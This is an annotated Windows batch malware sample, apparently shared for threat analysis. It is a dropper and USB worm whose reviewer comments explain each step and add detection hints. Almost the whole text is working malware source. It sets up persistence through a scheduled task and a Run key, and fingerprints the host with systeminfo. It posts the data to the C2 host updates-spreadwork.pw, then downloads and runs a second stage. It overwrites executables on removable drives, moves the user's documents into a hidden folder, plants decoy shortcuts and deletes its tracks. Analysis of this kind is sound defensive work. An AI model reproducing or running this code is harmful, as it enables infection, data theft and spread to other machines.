REM @VK_Intel
REM MD5: 7ac3a99fb79ec2143900afa73c47b243
REM Self-extractable executable
REM Analyst notes: Windows batch dropper and removable-drive worm, preserved
REM as found. Lines marked NOTE or DETECT were added during review and only
REM describe what the visible lines do. Flow: recover the body of the SFX that
REM launched this script, install persistence, beacon to the C2 when online,
REM then seed every removable drive found via WMIC with decoy shortcuts.
@echo off
setlocal ENABLEDELAYEDEXPANSION
REM NOTE: in cmd, REM written after a set value is not a comment - everything
REM up to end of line becomes part of the value. This affects vers, telotroyan
REM and chromus below, so the runtime artefact names may differ from what the
REM author intended; confirm exact names in a sandbox before writing IoCs.
REM Implant version string, built from the first script argument.
set vers=%1_c.01 REM implant version
set ver=%vers%
REM Name of the update payload fetched in the updat branch.
set updata=%1.tmp
REM Per-extension limits on how many decoy shortcuts a directory may hold;
REM consumed as pred by firstaction and actions.
set /a maxword=10
set /a maxword1=10
set /a maxtxt=10
set /a maxjpg=10
REM Local copy of the dropper body, filled in by prosesstron below.
set files=zoom.exe
REM Name the body is written under on removable media.
set telotroyan=bootstat.dat REM trojan body - bootst
REM Name used for the persisted copy, the scheduled task and the Run value.
set chromus=OfficePlugin REM masked as OfficePlugin
REM C2 host. IoC: updates-spreadwork.pw. Reassembled from three parts at the
REM beacon stage.
REM URL http://updates-spreadwork.pw
REM set domenus1=http://
REM set domenus2=updates-
REM set domenus3=spreadwork.pw
REM Copy the executable of the parent process to zoom.exe.
call :prosesstron %files%
REM Loopback ping, presumably used as a short delay - confirm.
ping 127.0.0.1
REM Parse the OS version from the ver command; 5.1 is Windows XP.
For /F "Tokens=2 Delims=[]" %%i In ('ver') Do (
For /F "Tokens=2,3 Delims=. " %%a In ("%%i") Do Set versions=%%a.%%b
)
If "%versions%"=="5.1" goto xpos
REM Non-XP: persist under the user profile, task fires every 10 minutes.
set chromusdir=%APPDATA%\Microsoft\Office\Plugin
set param222=/SC MINUTE /MO 10 /F
goto viber
:xpos
REM XP: persist under the Windows directory and run the task as SYSTEM.
set chromusdir=%WINDIR%\Microsoft\Office\Plugin
set param222=/SC MINUTE /MO 10 /RU "SYSTEM"
goto viber
:viber
REM Install: create the plugin directory, drop the body as OfficePlugin.exe,
REM remove any staged update left from a previous run.
if not exist "%chromusdir%\*.*" MD "%chromusdir%"
copy "%files%" "%chromusdir%\%chromus%.exe" /y
del /f /q "%chromusdir%\*.tmp"
REM Persistence 1: scheduled task, created only when the query fails.
REM DETECT: schtasks /Create spawned by cmd.exe with a MINUTE schedule whose
REM action points into a Microsoft\Office\Plugin path.
schtasks /Query /tn %chromus%
if errorlevel 1 (
schtasks /Create %param222% /tn %chromus% /tr "%chromusdir%\%chromus%.exe"
)
REM Persistence 2: HKCU Policies\Explorer\Run value, added when the query
REM does not already show the installed path.
REM DETECT: reg.exe writes under Policies\Explorer\Run are unusual for users.
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v %chromus% | Find "%chromusdir%\%chromus%.exe"
If %ERRORLEVEL% == 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v %chromus% /t REG_EXPAND_SZ /d "%chromusdir%\%chromus%.exe" /f
)
:spread
setlocal enabledelayedexpansion
REM Generate a random 15-character name from the 62 symbols in nabor and
REM append it to downlist.txt; it is read back as the download file name.
set nabor=qQwWeErRtTyYuUiIoOpPaAsSdDfFgGhHjJkKlLzZxXcCvVbBnNmM1234567890
set long=15
call :writePwd downlist.txt
setlocal enableextensions enabledelayedexpansion
REM Connectivity check: a TTL line in the ping output means online, so go to
REM otsetup for the beacon; otherwise skip straight to the drive stage.
ping 8.8.8.8 |>nul find /i "TTL=" &&goto otsetup||goto capiton
:otsetup
REM ImagingDevices.exe is invoked below with --post-data, -q, -N and -O,
REM which are GNU wget options; presumably a renamed wget bundled in the SFX.
taskkill /f /im ImagingDevices.exe
setlocal enabledelayedexpansion
REM Look for a companion scheduled task named StateBinDLL: pull its command
REM out of the task XML and, if the task or file is absent, prefix the
REM reported version with NO_DLLS.
schtasks /Query /TN StateBinDLL /XML | find /i "command" > "%CD%\statebin.ini"
for %%i in ("%CD%\statebin.ini") do (
if %%~zi==0 (
set ver=NO_DLLS-%ver%
goto metka
)
)
set /p x=<"%CD%\statebin.ini"
set /p "x=%x:~15,-10%"<nul >"%CD%\statebin.ini"
set /p tmps=<"%CD%\statebin.ini"
REM If the task command is rundll32.exe the real path is in its arguments.
if %tmps%==rundll32.exe goto updll2
:updll
if not exist "%tmps%" (set ver=NO_DLLS-%ver%)
:metka
REM Host fingerprint: C: volume serial, full systeminfo table, computer name.
For /F "Tokens=4*" %%B In ('vol c:') Do set updates=%%B
if errorlevel 1 set updates=00000-00000
set comments=%updates:-=%
REM systeminfo lines are joined with a +### separator and sent in the beacon.
REM DETECT: systeminfo from a cmd.exe whose parent is an unknown SFX,
REM followed shortly by outbound HTTP.
systeminfo /FO TABLE /NH > system.ini
FOR /F "tokens=*" %%i IN (system.ini) do @IF NOT X%%i==X set infosys=!infosys!%%i+###
set IDs=%computername%_%comments%
set IDs=%IDs: =%
REM First removable-drive enumeration. DriveType 2 is removable media;
REM TestDisk fills USB and ID from the Name and VolumeSerialNumber lines.
setlocal
set ID=0
For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j
set flashid=%ID%
if %ID%==0 set flashid=000000
REM NOTE: the next line is a bare URL, not a command. Left as found.
http://updates-spreadwork.pw
REM C2 host split into three parts, presumably to defeat simple string scans.
set domenus1=http://
set domenus2=updates-
set domenus3=spreadwork.pw
set /p down=<downlist.txt
REM Beacon: HTTP POST of version, computer name, host id, systeminfo dump and
REM removable-drive serial; the response is saved under the random name.
ImagingDevices.exe --post-data="versiya=%ver%&comp=%computername%&id=%IDs%&sysinfo=%infosys%&fid=%flashid%" "%domenus1%%domenus2%%domenus3%" -q -N %domenus1%%domenus2%%domenus3% -O %down%
REM Response handling by size: empty - nothing; 30000 bytes or less - treat
REM the content as an update URL; larger - run it as a second stage.
for %%i in (%down%) do (set /a size=%%~Zi)
if %size%==0 goto capiton
if %size% LEQ 30000 goto updat
start /b %down%.exe
goto capiton
:updat
REM Update path: the downloaded file holds a base URL; fetch updata from it,
REM stage it beside the persisted copy as .tmp and hand over to kill.cmd,
REM which is not on this page.
set /p zagr=<%down%
If %ERRORLEVEL% == 0 (
ImagingDevices.exe "%zagr%/%updata%"
copy "%updata%" "%chromusdir%\%chromus%.tmp" /y
call kill.cmd %chromusdir% %chromus%
)
:capiton
REM Removable-drive stage. Re-enumerate drives; with none found, jump to
REM cleanup. ZarFlash runs once per drive serial, tracked by an ID.usb marker
REM file in the plugin directory.
setlocal
set ID=0
For /F "Tokens=1,2* Delims==" %%i In ('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="') Do Call :TestDisk %%i %%j
if %ID%==0 goto outlog
If Not Exist %USB% goto outlog
if not exist %USB%\* goto outlog
If Not Exist "%chromusdir%\%ID%.usb" call :ZarFlash
REM Hidden Recycle folder on the drive; original documents are moved there.
set papka=Recycle
set directors=%USB%\%papka%
If Not Exist %directors% (
MD %directors%
attrib +h %directors%
)
REM Explorer view settings: Hidden set to 2 - hidden files not shown - and
REM HideFileExt set to 0. DETECT: reg.exe writing Explorer\Advanced from a
REM non-interactive cmd.exe.
REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden | Find "0x2"
If %ERRORLEVEL% == 1 (
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v Hidden /t REG_DWORD /d 00000002 /f
)
REG QUERY "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt | Find "0x0"
If %ERRORLEVEL% == 1 (
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ /v HideFileExt /t REG_DWORD /d 00000000 /f
)
REM Unhide everything on the drive, then overwrite every file carrying one of
REM the system-looking names below, and every .exe on the drive, with the
REM dropper body. Existing executables on the drive are replaced.
setlocal enabledelayedexpansion
attrib -h "%USB%\*.*" /s
for %%F in (disk.inf pagefile.sys ntuser.ini disk.trashinfo boot.sys win.ini usb.ini ntuser.log ntuser.sys bootstat.dat) do (
for /f "Tokens=1* Delims=" %%a in ('dir /b/s %USB%\%%F') do (
copy "%files%" "%%a" /y
attrib +h "%%a"
)
)
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.exe"') do (copy "%files%" "%%r" /y)
REM NOTE: unmatched closing parenthesis in the sample. Left as found.
)
REM Refresh existing decoy shortcuts of each type from the bundled doc.lnk,
REM docx.lnk, txt.lnk and jpg.lnk files in the current directory.
set rashirenie=doc.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=docx.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=txt.lnk
call :delsrashlnks %rashirenie% %USB%
set rashirenie=jpg.lnk
call :delsrashlnks %rashirenie% %USB%
REM Collapse doubled .lnk.lnk names, then drop the body beside every shortcut.
for /f "Tokens=1* delims=" %%g in ('dir /b/s "%USB%\*.lnk.lnk"') do (ren "%%g" "%%~ng")
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y)
REM Decoy shortcuts per document type. The icon is wordicon.exe from the
REM Windows Installer directory when present, else a SHELL32.dll index.
REM firstaction walks every subdirectory; the positional arguments are passed
REM but the subroutine reads the globals ico, rash, pred, USB and LINKS.
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=doc
set /a pred=%maxword%
call :firstaction %ico% %rash% %pred% %USB%
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=docx
set /a pred=%maxword%
call :firstaction %ico% %rash% %pred% %USB%
set LINKS=%SystemRoot%\system32\SHELL32.dll
set /a ico=70
set rash=txt
set /a pred=%maxtxt%
call :firstaction %ico% %rash% %pred% %USB%
set LINKS=%SystemRoot%\system32\SHELL32.dll
set /a ico=302
set rash=jpg
set /a pred=%maxjpg%
call :firstaction %ico% %rash% %pred% %USB%
REM Same treatment for .doc files in the drive root: count existing shortcuts
REM and hand the second document to actions while under the limit.
for /f "Tokens=1* Delims=" %%K in ('dir /s /b %SystemRoot%\Installer\wordicon.exe') do (
set LINKS=%%K
)
if not defined LINKS set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=1
set rash=doc
set /a pred=%maxword1%
set i=0
set num=0
set flashdirectors=%USB%
for %%j in ("!flashdirectors!\*.lnk") do (set /a num+=1)
for %%f in ("!flashdirectors!\*.doc") do (
set /a i+=1
if /I !num! LEQ %pred% (
if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%")
)
)
REM Drop the body beside every shortcut once more and hide all copies.
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.lnk"') do (copy "%files%" "%%~dpr%telotroyan%" /y)
attrib +h %USB%\%telotroyan% /s
attrib +h %%directors%%
:outlog
REM Cleanup: kill the mshta.exe helpers, remove empty directories under TEMP
REM and delete everything in the current - SFX extraction - directory.
REM DETECT: rd /s /q over TEMP and del of the working directory right after
REM mshta.exe activity from the same cmd.exe.
taskkill /f /im mshta.exe
for /r "%TEMP%" %%d in (.) do dir /b "%%~d" | find /v "">nul || rd /s /q "%%~d"
del /f /q "%CD%\*.*"
exit
:firstaction
REM Walk every subdirectory of the removable drive. For each directory count
REM its .lnk files, leave the Recycle folder unselected, and hand the second
REM file of the current extension to actions while the count is under pred.
REM The four positional arguments passed by the caller are not read here;
REM the body uses the globals USB, directors, rash, pred and LINKS.
for /f "delims=" %%d in ('dir /b/s/ad "%USB%"') do (
set i=0
set num=0
for %%j in ("%%d\*.lnk") do (set /a num+=1)
if /i not %%d==%directors% set flashdirectors=%%d
for %%f in ("!flashdirectors!\*.%rash%") do (
set /a i+=1
if /I !num! LEQ %pred% (
if /I !i! == 2 (call :actions "%%f" !num! %pred% "!flashdirectors!\" %rash% "%LINKS%")
)
)
)
EXIT /B
:actions
REM Replace one document with a decoy shortcut. Arg 1 is the document path;
REM num, pred, rash, directors, papka, telotroyan, files, flashdirectors,
REM LINKS and ico are read as globals.
REM Steps: bail out once the shortcut limit is reached; copy the document
REM into the hidden Recycle folder under a random FILE name; drop the body
REM into the directory; write a .lnk carrying the document name whose target
REM is cmd.exe with arguments that open the moved document, unhide the body
REM and start it, minimised, with the icon of the real file type; delete the
REM original.
REM DETECT: mshta.exe launched with a vbscript:Execute command line that
REM creates shortcuts; .lnk files on removable media whose target is cmd.exe
REM with attrib and start in the arguments.
REM Code page 1251 is Cyrillic, presumably for non-ASCII file names - confirm.
chcp 1251 >nul
if /I !num! GEQ %pred% (exit /B)
set RAN=%RANDOM%
copy /y "%~1" "%directors%\FILE%RAN%.%rash%"
set starts=\%papka%\FILE%RAN%.%rash%
set startfill="/C %starts% & attrib -h %telotroyan% & start %telotroyan%"
copy %files% "!flashdirectors!\%telotroyan%" /y
start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%~1.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%startfill%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()")
del /f /q "%~1"
EXIT /B
:TestDisk
REM Called once per key=value line of the WMIC output, key in arg 1 and value
REM in arg 2, and stores it in a variable named after the key. When the
REM VolumeSerialNumber line arrives, publishes USB - the drive letter from the
REM preceding Name line - and ID. With several removable drives the last one
REM enumerated wins, since each call overwrites both.
Set $%1=%2
If %1==VolumeSerialNumber If Defined $%1 (Set USB=%$Name%& Set ID=%$VolumeSerialNumber%)
EXIT /B
:ZarFlash
REM First-time infection of a drive: copy the body to the drive root as
REM bootstat.dat; create a shortcut named after the current date, SHELL32
REM icon index 3, whose target is cmd.exe opening explorer.exe and then
REM unhiding and starting the body; write an empty ID.usb marker into the
REM plugin directory so the drive is not reprocessed; hide the body.
REM DETECT: a .lnk in a removable drive root named as a date string with
REM cmd.exe as its target.
copy %files% "%USB%\%telotroyan%" /y
set LINKS=%SystemRoot%\system32\SHELL32.dll
set ico=3
set lnkfiles="/C %windir%\explorer.exe & attrib -h %telotroyan% & start %telotroyan%"
start /b mshta.exe vbscript:Execute("Set x=CreateObject(""WScript.Shell"").CreateShortcut(""%USB%\%date%.lnk""):x.TargetPath=""%comspec%"":x.Arguments="%lnkfiles%":x.WindowStyle=7:x.IconLocation=""%LINKS%, %ico%"":x.Save():Close()")
cd.>"%chromusdir%\%ID%.usb"
attrib +h "%USB%\%telotroyan%"
EXIT /B
:prosesstron
REM Locate the executable this script was extracted from and copy it to
REM files - zoom.exe. Arg 1 is passed but the global files is read.
REM Method: scan the WMIC process list for a CommandLine containing this
REM script's file name - mn - and keep the ParentProcessId line that follows
REM it; match that PID against fixed tasklist columns to get the parent image
REM name; ask WMIC for that image's ExecutablePath.
REM DETECT: wmic process get ... commandline and tasklist spawned from a
REM cmd.exe running out of an SFX extraction directory.
setlocal ENABLEDELAYEDEXPANSION
set read=0
set mn=%~nx0
for /f "usebackq tokens=1* delims==" %%A IN (`wmic process get parentprocessid^, commandline /value`) DO (
if "!read!"=="1" (
if "%%A"=="ParentProcessId" (set prntid=%%B)
)
if "%%A"=="CommandLine" (
set cmdln=%%B
if not "!cmdln:%mn%=!"=="!cmdln!" (
set read=1
) else (
set read=0
)
)
)
SET /a pid=%prntid%
REM tasklist columns are sliced by position: image name in the first 24
REM characters, PID in the 8 characters from offset 26.
FOR /f "skip=3delims=" %%a IN ('tasklist') DO (
SET "found=%%a"
SET /a foundpid=!found:~26,8!
SET /a foundpid=!found:~26,8!
IF %pid%==!foundpid! set ParentName=!found:~0,24%!
)
set "ProcName=%ParentName: =%"
for /f "tokens=1* delims==" %%i in ('
wmic process where "Name='%ProcName%'" get ExecutablePath /value^| findstr :
') do set ExecutablePath=%%j
copy "%ExecutablePath%" "%files%" /y
EXIT /B
:delsrashlnks
REM For every file on the drive ending in the current rashirenie value - for
REM example doc.lnk - copy the bundled file of that name from the current
REM directory over it; xcopy /d only replaces it when the local copy is newer.
REM Two arguments are passed by the caller but the globals rashirenie and USB
REM are read.
for /f "Tokens=1* Delims=" %%r in ('dir /b/s "%USB%\*.!rashirenie!"') do (
xcopy /d /q /y "%rashirenie%" "%%r"
)
EXIT /B
:updll2
REM When the StateBinDLL task command is rundll32.exe, take the path from the
REM Arguments element of the task XML instead; the substring offsets 17 and
REM -10 strip the surrounding XML tags. Then return to the existence check.
schtasks /Query /TN StateBinDLL /XML | find /i "arguments" > "%CD%\statebin.ini"
set /p y=<"%CD%\statebin.ini"
set /p "y=%y:~17,-10%"<nul >"%CD%\statebin.ini"
set /p tmps=<"%CD%\statebin.ini"
goto updll
:writePwd
REM Build a random string of long characters by calling getRandS once per
REM position and append it as a line to the file named by arg 1. The caller
REM later reads the first line of that file back as the download file name.
set Pwd=
for /L %%A IN (1,1,%long%) DO (
call :getRandS
set Pwd=!Pwd!!rands!
)
echo.%Pwd%>>"%~1"
exit /b
:getRandS
REM Pick one character of nabor at a random index and return it in rands.
REM 62 is the length of nabor - 52 letters plus 10 digits.
set /a RandKey=%RANDOM% %% 62
set rands=!nabor:~%RandKey%,1!
exit /b